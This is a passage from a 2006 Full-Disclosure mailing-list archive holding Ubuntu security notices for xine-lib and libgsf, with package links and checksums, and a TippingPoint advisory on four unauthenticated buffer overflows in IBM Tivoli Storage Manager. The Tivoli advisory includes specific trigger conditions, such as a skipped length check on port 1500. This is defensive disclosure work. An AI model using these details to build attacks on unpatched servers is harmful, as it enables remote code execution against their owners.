a specially crafted stream from a malicious server, the attacker could execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.7.diff.gz Size/MD5: 11946 ea5e6e40994f219ea88ee46def12b536 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.7.dsc Size/MD5: 1187 2a4db66f12bce54bfa453e49c4cec531 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz Size/MD5: 7774954 9be804b337c6c3a2e202c5a7237cb0f8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.7_amd64.deb Size/MD5: 109216 0130ccfcc467dfd0bd25886db806c377 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.7_amd64.deb Size/MD5: 3611828 233e2ab263ec680c67b794d0689d27ee i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.7_i386.deb Size/MD5: 109210 f2a3fdf298acaa78b74bec58a7090d53 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.7_i386.deb Size/MD5: 4005142 576a8b340ba09c9241a018ab46cf44e4 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.7_powerpc.deb Size/MD5: 109230 2719c275e06f4215d7f1b36900ca6411 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.7_powerpc.deb Size/MD5: 3850402 ff0041a720565876bce10d7a250c1469 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.7_sparc.deb Size/MD5: 109224 b628e6801a7c0def40d01234a547b07e http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.7_sparc.deb Size/MD5: 3695786 55a326fd10cc11aed4bdf090b4fdb3fb Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.5.diff.gz Size/MD5: 19624 bc3bcd25cd87d3acc5cc5b0d2491944c http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.5.dsc Size/MD5: 1113 f5cf8751705551296683836d779341f1 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz Size/MD5: 6099365 5d0f3988e4d95f6af6f3caf2130ee992 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.5_amd64.deb Size/MD5: 115738 773156901500dd6cdc71738a04545704 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.5_amd64.deb Size/MD5: 2615152 023384da81522f625b2f774b9dc66ea8 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.5_i386.deb Size/MD5: 115744 2690e4f3c56f99d984da7ca0d1bf684c http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.5_i386.deb Size/MD5: 2934258 1e93778bed32747a3b2cffe2b4d641b7 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.5_powerpc.deb Size/MD5: 115746 8f9e092f5ef63abc10e23dc4b611f965 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.5_powerpc.deb Size/MD5: 2724898 f144069c4a0f87595b432c8911a1948a sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.5_sparc.deb Size/MD5: 115746 c4c2748bc59648ebd54764339eb01801 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.5_sparc.deb Size/MD5: 2591670 6fb14b10541e18b84757888994abcfc4 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1-0ubuntu3.2.diff.gz Size/MD5: 71320 7cd3d7f480eb049e33e6c98bd12dcf53 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1-0ubuntu3.2.dsc Size/MD5: 1445 cc9290432a85b3b4a4f189b264f71083 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1.orig.tar.gz Size/MD5: 4583422 9c05a6397838e4e2e9c419e898e4b930 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine-main1_1.1.2+repacked1-0ubuntu3.2_all.deb Size/MD5: 38946 8120c98e3303e118da3bcc72b17c3555 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.2_amd64.deb Size/MD5: 118880 d255df065d3f0a4dfdb41fd052002c1b http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.2_amd64.deb Size/MD5: 3442784 3a397cd06f001294e87c8a643224e01d http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.2_amd64.deb Size/MD5: 2914488 a214c7af8d360dfd2c198e6ae1213956 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.2_i386.deb Size/MD5: 118874 c9314715a8361ffc0046e981abc49172 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.2_i386.deb Size/MD5: 3771764 7e3a534a4ea98ac065dec40376dcc520 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.2_i386.deb Size/MD5: 3221924 b86497b00c1b4cbad1889aa102ffb779 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.2_powerpc.deb Size/MD5: 118888 822c79d2879d62a3119dd5a37bda2df4 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.2_powerpc.deb Size/MD5: 3469392 65d938ff9c114b436f9bb2df81da2a9f http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.2_powerpc.deb Size/MD5: 3043066 280e1c942fb7ee3a66117342f848bcb2 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.2_sparc.deb Size/MD5: 118888 1b3224f90d39958a411b23c841d788bb http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.2_sparc.deb Size/MD5: 3136330 10a0a1e2261b098fc597c51307a596d9 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.2_sparc.deb Size/MD5: 2856892 9ba9c8b97177549067dd73631c49430c -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061204/50a10ea9/attachment.bin From kees at ubuntu.com Mon Dec 4 22:01:56 2006 From: kees at ubuntu.com (Kees Cook) Date: Mon, 4 Dec 2006 14:01:56 -0800 Subject: [Full-disclosure] [USN-391-1] libgsf vulnerability Message-ID: <20061204220156.GH3984@outflux.net> =========================================================== Ubuntu Security Notice USN-391-1 December 04, 2006 libgsf vulnerability CVE-2006-4514 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libgsf-1 1.12.3-3ubuntu3.1 Ubuntu 6.06 LTS: libgsf-1-113 1.13.99-0ubuntu2.1 Ubuntu 6.10: libgsf-1-114 1.14.1-2ubuntu1.1 After a standard system upgrade you need to restart your desktop session to effect the necessary changes. Details follow: A heap overflow was discovered in the OLE processing code in libgsf. If a user were tricked into opening a specially crafted OLE document, an attacker could execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.12.3-3ubuntu3.1.diff.gz Size/MD5: 27753 80621e2ac15a13b5287615a1be6b607c http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.12.3-3ubuntu3.1.dsc Size/MD5: 850 e4f4a30353ddd96a4b0fb9c2609f6175 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.12.3.orig.tar.gz Size/MD5: 693033 976b3563b39d22d303b912a7dd336e50 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dbg_1.12.3-3ubuntu3.1_amd64.deb Size/MD5: 93916 e3f251d2a19dd04508b3fd70118fea9b http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.12.3-3ubuntu3.1_amd64.deb Size/MD5: 224874 cf37dac4ff14f771d8a282dfeced02d9 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1_1.12.3-3ubuntu3.1_amd64.deb Size/MD5: 127156 d7c0a9ba1e3aa0ad9d0fa3cd9eb15a9b http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dbg_1.12.3-3ubuntu3.1_amd64.deb Size/MD5: 10806 ec1d092fc45eb5d0fb1253f427f38a5c http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.12.3-3ubuntu3.1_amd64.deb Size/MD5: 56998 9ead84cd7f21f16afede42b7bc5641fd http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1_1.12.3-3ubuntu3.1_amd64.deb Size/MD5: 49902 6dccb6462809ec7c3a1df450141e4999 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dbg_1.12.3-3ubuntu3.1_i386.deb Size/MD5: 86528 7ba7b433ee55244de36652d87256e2c1 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.12.3-3ubuntu3.1_i386.deb Size/MD5: 208374 76524689f50ffe03b125c504c4898ca0 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1_1.12.3-3ubuntu3.1_i386.deb Size/MD5: 119320 adeca028c0d161f4ef51861ca3f1ca4a http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dbg_1.12.3-3ubuntu3.1_i386.deb Size/MD5: 9882 0a768d6ea600c3522cce25a0a90d5928 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.12.3-3ubuntu3.1_i386.deb Size/MD5: 56072 911ec2cfba647e50a653b75e69024e04 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1_1.12.3-3ubuntu3.1_i386.deb Size/MD5: 49386 194b149dfe80139285ed17e07df361bc powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dbg_1.12.3-3ubuntu3.1_powerpc.deb Size/MD5: 96010 c6bd3befc34850dbb2c2878508af0df5 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.12.3-3ubuntu3.1_powerpc.deb Size/MD5: 230668 e65c9f0e97d2a57087367364f5dd6255 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1_1.12.3-3ubuntu3.1_powerpc.deb Size/MD5: 129918 72f74656095359513b5d4a08d488ac75 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dbg_1.12.3-3ubuntu3.1_powerpc.deb Size/MD5: 12526 84cd66738f8722663f33d2b3aed58ace http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.12.3-3ubuntu3.1_powerpc.deb Size/MD5: 57162 b05d543c92c391f0c6ddd2e100baa99c http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1_1.12.3-3ubuntu3.1_powerpc.deb Size/MD5: 51180 dd8d3a43ff9885747e4e6f524cb1c5e2 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dbg_1.12.3-3ubuntu3.1_sparc.deb Size/MD5: 90552 767d0cdc300d3c4a7f208f510abb96ab http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.12.3-3ubuntu3.1_sparc.deb Size/MD5: 217050 58be4ccddce2a59201686b95f3dd95bd http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1_1.12.3-3ubuntu3.1_sparc.deb Size/MD5: 124138 67a412538e0325c2e5281bcb72d5e773 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dbg_1.12.3-3ubuntu3.1_sparc.deb Size/MD5: 9734 105ed044c45d9fd15140f0197151b561 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.12.3-3ubuntu3.1_sparc.deb Size/MD5: 56502 dc87b8a235afa899b731dd802b258190 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1_1.12.3-3ubuntu3.1_sparc.deb Size/MD5: 49386 77bee1354c91c61874f28a059f029016 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.13.99-0ubuntu2.1.diff.gz Size/MD5: 9363 b1c523b8d8d38c7304441f4911a45358 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.13.99-0ubuntu2.1.dsc Size/MD5: 893 40e98355919e234ae2d344b35033b6c5 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.13.99.orig.tar.gz Size/MD5: 740978 dfd0c75b75066c4f30d484c79c045a62 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-common_1.13.99-0ubuntu2.1_all.deb Size/MD5: 44520 1e5736725ef753e9ce8ae592d8d6d77e amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-1-113-dbg_1.13.99-0ubuntu2.1_amd64.deb Size/MD5: 100194 1c1f61eb471bdacebb9b560ab6de14c2 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-113_1.13.99-0ubuntu2.1_amd64.deb Size/MD5: 129670 6d6e52bde88de0d68949c1fbba6c3165 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.13.99-0ubuntu2.1_amd64.deb Size/MD5: 240642 b6e5163afb458255e6672bb91363ea93 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-bin_1.13.99-0ubuntu2.1_amd64.deb Size/MD5: 51230 804d35ba7f4878b06ae14c01b2d21fea http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-gnome-1-113-dbg_1.13.99-0ubuntu2.1_amd64.deb Size/MD5: 10744 82daa38d026b93f917e312199c018b08 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-113_1.13.99-0ubuntu2.1_amd64.deb Size/MD5: 52686 701b5d256a00525c6d4b40fba6841e20 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.13.99-0ubuntu2.1_amd64.deb Size/MD5: 60278 68d31197c6ae7124ae04f711b15ba5b4 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-1-113-dbg_1.13.99-0ubuntu2.1_i386.deb Size/MD5: 92654 bcb9d24b9016e846f894edda0fcfd876 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-113_1.13.99-0ubuntu2.1_i386.deb Size/MD5: 121370 2fe82e4c0194aa74dd63c24d0b594872 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.13.99-0ubuntu2.1_i386.deb Size/MD5: 222942 46e3a01f6c482e1915ab0189490a9ce9 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-bin_1.13.99-0ubuntu2.1_i386.deb Size/MD5: 51108 3e5126f0dac4a1dd275ba0226c0cd9bb http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-gnome-1-113-dbg_1.13.99-0ubuntu2.1_i386.deb Size/MD5: 9812 770fa769202ea9f386ed8e80e95e23f7 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-113_1.13.99-0ubuntu2.1_i386.deb Size/MD5: 52160 16bf0d5d03d01dc71c3a55fed9e5e036 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.13.99-0ubuntu2.1_i386.deb Size/MD5: 59356 ac80966bdca86c14889eb1695a156472 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-1-113-dbg_1.13.99-0ubuntu2.1_powerpc.deb Size/MD5: 101980 53744f68ed423a7fe66d503915a10e24 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-113_1.13.99-0ubuntu2.1_powerpc.deb Size/MD5: 130764 291a79c8ef5da7d71014b8e4c4aa3ae1 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.13.99-0ubuntu2.1_powerpc.deb Size/MD5: 247112 9ae3b0a2cacdc9434ab69b002a51ba1d http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-bin_1.13.99-0ubuntu2.1_powerpc.deb Size/MD5: 52914 6e2cffd5f173e5d607c9848642ee6131 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-gnome-1-113-dbg_1.13.99-0ubuntu2.1_powerpc.deb Size/MD5: 12420 ca70e82767500f48de7f322b160a706b http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-113_1.13.99-0ubuntu2.1_powerpc.deb Size/MD5: 53986 37edad0daf13f5735c02aa19865e9558 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.13.99-0ubuntu2.1_powerpc.deb Size/MD5: 60458 f0807524a5015359301e881e2bd60db0 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-1-113-dbg_1.13.99-0ubuntu2.1_sparc.deb Size/MD5: 96218 be46011a498d119d834e286f43b77278 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-113_1.13.99-0ubuntu2.1_sparc.deb Size/MD5: 125986 85ea3ce9588a52019a8e5e2f8be298bd http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.13.99-0ubuntu2.1_sparc.deb Size/MD5: 231860 6820fff8de91dd44e6bbaa4cbb01b165 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-bin_1.13.99-0ubuntu2.1_sparc.deb Size/MD5: 51246 f31f57b09a465c1bdf250b55ac6a5a5d http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-gnome-1-113-dbg_1.13.99-0ubuntu2.1_sparc.deb Size/MD5: 9652 ed2eba00c8360233cdb9574d878aea37 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-113_1.13.99-0ubuntu2.1_sparc.deb Size/MD5: 52142 78de48d6c9602c35e0ce831895310462 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.13.99-0ubuntu2.1_sparc.deb Size/MD5: 59762 8e0f17ca33004cf4061d01217a6f631e Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.14.1-2ubuntu1.1.diff.gz Size/MD5: 9276 bb8529ca4bbca6befd63abf9d5ee6bd3 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.14.1-2ubuntu1.1.dsc Size/MD5: 886 8a360c2db8e5f18d3ff10150a678bf66 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf_1.14.1.orig.tar.gz Size/MD5: 736910 bf918b450a946a365719f78a957700bf Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-common_1.14.1-2ubuntu1.1_all.deb Size/MD5: 45716 1cf2b68bb59e6c99406718d95e85b51b amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-114-dbg_1.14.1-2ubuntu1.1_amd64.deb Size/MD5: 101202 2fc4818219dd2eec12be797f9694e2d1 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-114_1.14.1-2ubuntu1.1_amd64.deb Size/MD5: 132190 4919dee1959bd79ef9b9e687e05faccb http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.14.1-2ubuntu1.1_amd64.deb Size/MD5: 241188 254fef90bced7a4c7af377534b3abbf0 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-bin_1.14.1-2ubuntu1.1_amd64.deb Size/MD5: 53160 07c590ffa9b4678b415dd2f43705f5c9 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-114-dbg_1.14.1-2ubuntu1.1_amd64.deb Size/MD5: 10768 5fbf90f0eecda7b4b5ff445aeecd41f0 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-114_1.14.1-2ubuntu1.1_amd64.deb Size/MD5: 54292 d2278a4d4e1b3adfae427c40416c038d http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.14.1-2ubuntu1.1_amd64.deb Size/MD5: 61232 ead489a5ea7dd59be1958e5ad9b9dce1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-114-dbg_1.14.1-2ubuntu1.1_i386.deb Size/MD5: 97614 a581f24e84734643739425a131e16b35 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-114_1.14.1-2ubuntu1.1_i386.deb Size/MD5: 127752 48371720e8b5a76b30be2a57cbb6e3fc http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.14.1-2ubuntu1.1_i386.deb Size/MD5: 226382 b74f367c699e81dca2cbfa83d90cf2d5 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-bin_1.14.1-2ubuntu1.1_i386.deb Size/MD5: 52754 1baf5e199555747eeeb9059c443ace50 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-114-dbg_1.14.1-2ubuntu1.1_i386.deb Size/MD5: 10158 3d73aa4297945362a562b3b24b345c95 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-114_1.14.1-2ubuntu1.1_i386.deb Size/MD5: 53642 161a02edd48a803d3d088a6bb592e0e4 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.14.1-2ubuntu1.1_i386.deb Size/MD5: 60252 05fb5a2706802e46a7fed8639537d377 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-114-dbg_1.14.1-2ubuntu1.1_powerpc.deb Size/MD5: 103532 bf47b7789302ef795e12d7539b89f561 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-114_1.14.1-2ubuntu1.1_powerpc.deb Size/MD5: 133352 6b66a2247fb20df145507c05fb68f12c http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.14.1-2ubuntu1.1_powerpc.deb Size/MD5: 247112 7215b6cfc282fbc2b6f87c44ee10629b http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-bin_1.14.1-2ubuntu1.1_powerpc.deb Size/MD5: 54614 7ae855105d1039b60a396d5279bbb37f http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-114-dbg_1.14.1-2ubuntu1.1_powerpc.deb Size/MD5: 12586 9d6fd3c99baae16902b57be2e0f55b66 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-114_1.14.1-2ubuntu1.1_powerpc.deb Size/MD5: 55228 fe64dd66a2dbfd43ddb2ca8d5ec59388 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.14.1-2ubuntu1.1_powerpc.deb Size/MD5: 61102 5afa1603f0189763620b0d50b1a114eb sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-114-dbg_1.14.1-2ubuntu1.1_sparc.deb Size/MD5: 97862 deeb1a4f46bf418ef9d21942d433102c http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-114_1.14.1-2ubuntu1.1_sparc.deb Size/MD5: 128736 f243a563faa9be216fdd8715137ef7b0 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-1-dev_1.14.1-2ubuntu1.1_sparc.deb Size/MD5: 232330 0a425b8e18460919255522d84238a4f2 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgsf/libgsf-bin_1.14.1-2ubuntu1.1_sparc.deb Size/MD5: 52886 ba50b41aa260d9a8fe163d1a6cfeddda http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-114-dbg_1.14.1-2ubuntu1.1_sparc.deb Size/MD5: 9702 f96c8d050d8d50e32f5e75906c902ae3 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-114_1.14.1-2ubuntu1.1_sparc.deb Size/MD5: 53318 6cdd39d0eaf62737cb0818c2d8deca05 http://security.ubuntu.com/ubuntu/pool/main/libg/libgsf/libgsf-gnome-1-dev_1.14.1-2ubuntu1.1_sparc.deb Size/MD5: 60388 2368454dd6d4020d95871f8abd5c7a0a -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061204/cc7125c1/attachment.bin From TSRT at 3com.com Mon Dec 4 23:53:15 2006 From: TSRT at 3com.com (TSRT at 3com.com) Date: Mon, 4 Dec 2006 15:53:15 -0800 Subject: [Full-disclosure] TSRT-06-14: IBM Tivoli Storage Manager Mutiple Buffer Overflow Vulnerabilities Message-ID: TSRT-06-14: IBM Tivoli Storage Manager Mutiple Buffer Overflow Vulnerabilities http://www.tippingpoint.com/security/advisories/TSRT-06-14.html December 4, 2006 -- CVE ID: CVE-2006-5855 -- Affected Vendor: IBM -- Affected Products: Tivoli Storage Manager <5.2.9 Tivoli Storage Manager <5.3.4 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since April 3, 2006 by Digital Vaccine protection filter ID 4248. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: These vulnerabilities allow attackers to execute arbitrary code on vulnerable installations of IBM Tivoli Storage Manager. Authentication is not required to exploit these vulnerabilities. The specific flaws are similar and exist in the processing of messages by the Tivoli Storage Manager service, bound on TCP port 1500. The messages are structured in the form [index][size]. The 'index' field specifies an integer offset into the body of the message for a specific field, and the 'size' field specifies the size of the indexed field. As no validation is done on the index fields, an attacker can force the service to look beyond the end of the packet, often landing in unallocated memory and resulting in a denial of service. The size fields are often checked to ensure they do not exceed the bounds of the destination buffers that data is being copied to. However, we have found the following four instances where the size files are left unchecked: Overflow 1 The initial sign-on request contains a field to specify the language. In normal cases we've seen, this string is dscenu.txt. Typically the server will validate that the language string is no longer than 0x100 bytes. However, if the first byte of the language string is 0x18, this check will not occur, and a fixed sized buffer will be overrun. Overflows 2 and 3 There is an overflow vulnerability in messages processed by the SmExecuteWdsfSession function. There are two fields in this request, both are copied into fixed sized buffers, without any validation of their lengths. Overflow 4 There is an overflow in the open registration message due to an unchecked copy into a fixed size buffer for the contact field of the registration. All four of the above detailed overflows can lead to arbitrary code execution under the context of the Tivoli service. -- Vendor Response: IBM has issued an update to correct this vulnerability. More details can be found at: http://www-1.ibm.com/support/docview.wss?uid=swg21250261 -- Disclosure Timeline: 2006.04.03 - Digital Vaccine released to TippingPoint customers 2006.05.09 - Vulnerability reported to vendor 2006.12.04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by the TippingPoint Security 